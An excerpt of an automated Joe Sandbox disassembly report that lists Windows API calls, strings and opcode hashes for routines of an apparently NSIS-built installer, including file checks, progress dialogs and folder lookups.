                                                          • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                          • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                          • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                          • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402F44
                                                          • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                            • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                          • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                          Strings
                                                          • Null, xrefs: 00403029
                                                          • Inst, xrefs: 00403017
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                          • Error launching installer, xrefs: 00402F80
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                          • soft, xrefs: 00403020
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-787788815
                                                          • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                          • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                          • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                          • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                          • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                          • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                          • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                          • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                          • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                          • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-730719616
                                                          • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                          • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                          • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                          • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                          • GetSysColor.USER32(00000000), ref: 00404421
                                                          • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                          • SetBkMode.GDI32(?,?), ref: 00404439
                                                          • GetSysColor.USER32(?), ref: 0040444C
                                                          • SetBkColor.GDI32(?,?), ref: 0040445C
                                                          • DeleteObject.GDI32(?), ref: 00404476
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                          • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                          • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                            • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                          • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                          • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                          • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                          APIs
                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                          • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                          • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                          • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                          • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                          • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                          • GetTickCount.KERNEL32 ref: 00402EC7
                                                          • wsprintfW.USER32 ref: 00402EF5
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                            • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                          • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                          • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                          • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                          • GetMessagePos.USER32 ref: 00404D3D
                                                          • ScreenToClient.USER32(?,?), ref: 00404D57
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                          • wsprintfW.USER32 ref: 004067A4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                          • wsprintfW.USER32 ref: 00402E45
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                          • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                          • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                          • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                          APIs
                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                          • wsprintfW.USER32 ref: 00404CB6
                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$(7B
                                                          • API String ID: 3540041739-1320723960
                                                          • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                          • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                          • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                          • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                          • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                          • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                          • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                          • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                          • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                          • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                          • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                          • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401DBC
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                          • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                          • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                          • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                          • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                          • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                          • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                          • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
